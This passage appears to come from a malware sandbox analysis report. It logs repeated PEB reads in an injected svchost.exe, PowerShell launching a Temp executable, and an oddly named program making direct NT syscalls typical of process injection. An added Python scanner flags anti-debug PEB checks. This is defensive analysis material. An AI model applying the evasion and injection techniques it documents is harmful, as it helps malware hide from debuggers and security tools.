            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov ecx, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035050D9 mov eax, dword ptr fs:[00000030h]8_2_035050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD0C0 mov eax, dword ptr fs:[00000030h]8_2_034AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD0C0 mov eax, dword ptr fs:[00000030h]8_2_034AD0C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034590DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034550E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034550E4 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342D08D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03435096 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345D090 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345D090 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346909C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03443740 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03430750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03503749 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342B765 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03438770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03437703 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03435702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03435702 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03430710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03460710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346F71F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034EF72E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03433720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344F720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F972B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350B73C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03429730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03429730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03465734 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343973A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034357C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343D7E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034EF78A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B97A9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034BF7AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_035037B6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345D7B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F7BA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03469660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03469660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03462674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03461607 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346F603 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03433616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03433616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
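            The `mov eax, dword ptr fs:[00000030h]` entries above are the sandbox flagging reads of the PEB pointer: in a 32-bit (WOW64) process `fs:` addresses the TEB and offset 0x30 holds the PEB address. The read itself is not evidence of anything; what matters is the field the code dereferences next. `PEB+2` (BeingDebugged) and `PEB+0x68` (NtGlobalFlag) are the classic debugger checks that the "Checks if the current process is being debugged" signature refers to, while `PEB+0xC` (Ldr) is how position-independent code walks the loaded-module list to resolve APIs without an import table. The scanner below is an added example written for this page (it is not Joe Sandbox code) that finds the two 32-bit encodings of `mov r32, fs:[disp32]` in a raw byte blob and classifies the following dereference. The input blob is constructed by hand from instruction encodings, not taken from the sample.

```python
"""Find TEB reads through the fs segment in 32-bit x86 code and classify the
PEB field dereferenced right after `mov r32, fs:[30h]`.

Added example for this report section; not Joe Sandbox code. The blob at the
bottom is constructed from instruction encodings, not taken from the sample.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# TEB fields that 32-bit code reads through fs:[disp32]
TEB_FIELDS = {
    0x00: "NtTib.ExceptionList (SEH chain)",
    0x18: "NtTib.Self (TEB)",
    0x30: "ProcessEnvironmentBlock (PEB)",
}

# PEB fields reached by one dereference of the pointer loaded from fs:[30h]
# (32-bit PEB layout). The first and last are debugger checks; Ldr heads the
# module list that shellcode walks to resolve APIs by hand.
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x68: "NtGlobalFlag",
}


@dataclass
class Hit:
    offset: int               # byte offset of the fs: load in the blob
    reg: str                  # register that receives the TEB field
    teb_field: str            # what fs:[disp32] points at
    peb_field: Optional[str]  # PEB field read next, only for fs:[30h] loads


def _next_deref(code: bytes, pos: int, reg: int) -> Optional[str]:
    """Name the PEB field if the instruction at `pos` is `movzx r32, byte ptr
    [reg+disp8]` (0F B6 /r) or `mov r32, [reg+disp8]` (8B /r) with mod=01, base=reg."""
    if code[pos:pos + 2] == b"\x0f\xb6" and pos + 3 < len(code):
        modrm, disp = code[pos + 2], code[pos + 3]
    elif code[pos:pos + 1] == b"\x8b" and pos + 2 < len(code):
        modrm, disp = code[pos + 1], code[pos + 2]
    else:
        return None
    if (modrm >> 6) != 0b01 or (modrm & 7) != reg or reg == 4:  # base=esp needs a SIB byte
        return None
    return PEB_FIELDS.get(disp, f"PEB+0x{disp:x}")


def scan(code: bytes) -> List[Hit]:
    """Pattern scan (not a full disassembler) for `mov r32, fs:[disp32]`."""
    hits: List[Hit] = []
    i = 0
    while i < len(code) - 1:
        if code[i] != 0x64:                       # fs: segment override prefix
            i += 1
            continue
        op = code[i + 1]
        if op == 0xA1 and i + 6 <= len(code):     # A1 moffs32: mov eax, fs:[disp32]
            reg, disp, end = 0, int.from_bytes(code[i + 2:i + 6], "little"), i + 6
        elif op == 0x8B and i + 7 <= len(code) and (code[i + 2] & 0xC7) == 0x05:
            reg = (code[i + 2] >> 3) & 7          # 8B /r, modrm mod=00 rm=101: disp32, no base
            disp, end = int.from_bytes(code[i + 3:i + 7], "little"), i + 7
        else:
            i += 1
            continue
        peb = _next_deref(code, end, reg) if disp == 0x30 else None
        hits.append(Hit(i, REG32[reg], TEB_FIELDS.get(disp, f"TEB+0x{disp:x}"), peb))
        i = end
    return hits


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count which PEB fields are read via fs:[30h]."""
    counts: Dict[str, int] = {}
    for h in hits:
        if h.peb_field:
            counts[h.peb_field] = counts.get(h.peb_field, 0) + 1
    return counts


def looks_anti_debug(hits: List[Hit]) -> bool:
    """True when the PEB pointer is used to read a debugger-visible flag."""
    return any(h.peb_field in ("BeingDebugged", "NtGlobalFlag") for h in hits)


# Constructed blob (not from the sample): four fs: loads plus filler.
SAMPLE = bytes.fromhex(
    "64A130000000" "0FB64002"    # mov eax, fs:[30h]; movzx eax, byte ptr [eax+2]
    "648B0D30000000" "8B4168"    # mov ecx, fs:[30h]; mov eax, [ecx+68h]
    "648B3530000000" "8B460C"    # mov esi, fs:[30h]; mov eax, [esi+0Ch]
    "64A118000000"               # mov eax, fs:[18h]
    "9090C3"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"+0x{h.offset:04x} {h.reg:<3} <- {h.teb_field} -> {h.peb_field}")
    print("anti-debug:", looks_anti_debug(scan(SAMPLE)))
```

            Run it on the bytes of the injected region (a dump of the 8_2_034xxxxx range from svchost.exe, for instance) rather than on the whole file: the report lists only the fs:[30h] loads, and without the follow-up field a count of them does not separate a BeingDebugged check from a plain Ldr walk. Because this is a byte-pattern scan, a 0x64 byte inside an immediate can produce a false match; a disassembler-backed tool such as capstone avoids that.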

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtOpenFile: Direct from: 0x77382DCC
